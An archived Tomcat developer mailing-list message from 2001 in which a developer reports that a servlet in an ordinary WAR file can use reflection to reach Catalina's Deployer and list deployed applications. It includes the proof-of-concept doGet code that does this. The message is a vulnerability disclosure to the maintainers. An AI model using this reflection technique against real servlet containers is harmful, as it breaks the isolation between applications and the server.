tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Fabien Le Floc'h <...@operamail.com>
Subject container security issue
Date Fri, 11 May 2001 19:05:42 GMT
I apologize for repeating this, but I did not yet get any answer.

I wrote a servlet in a classic WAR file at an arbitrary location and NOT in the org.apache.catalina
package. From this servlet, I was able to access a method on the Deployer, i.e. I was able
to access anything public in any Container "from outside". This is only working by using reflection.

Here is the code (not clean, sorry about that) for the doGet method:

	response.setContentType("text/plain");
	PrintWriter writer = response.getWriter();

	Object theWrapper = (Object) this.getServletConfig();
	try {
	    Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});

	    Object theContext = method.invoke(theWrapper, new Object[] {});
	    method = theContext.getClass().getMethod("getParent", new Class[] {});
	    Object theDeployer = method.invoke(theContext, new Object[] {});
	    method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
	    Object deployedApps = method.invoke(theDeployer, new Object[] {});
	    String[] apps = (String[]) deployedApps;
	    writer.println("detected apps:");
	    for (int i=0; i<apps.length;i++) {
		writer.println(apps[i]);
	    }
	} catch (Exception e) {
	    e.printStackTrace();
	    writer.println("An exception occured when invoking the method, "+e.getMessage());
	}
	writer.flush();
	writer.close();



Conclusion: there is a security issue. We don't need the prerequisite to access Catalina core
classes. I am really wondering how it would be possible to fix this security problem without
an important redesign.


Regards,


Fabien

P.S.: should I include a WAR file?


Mime
View raw message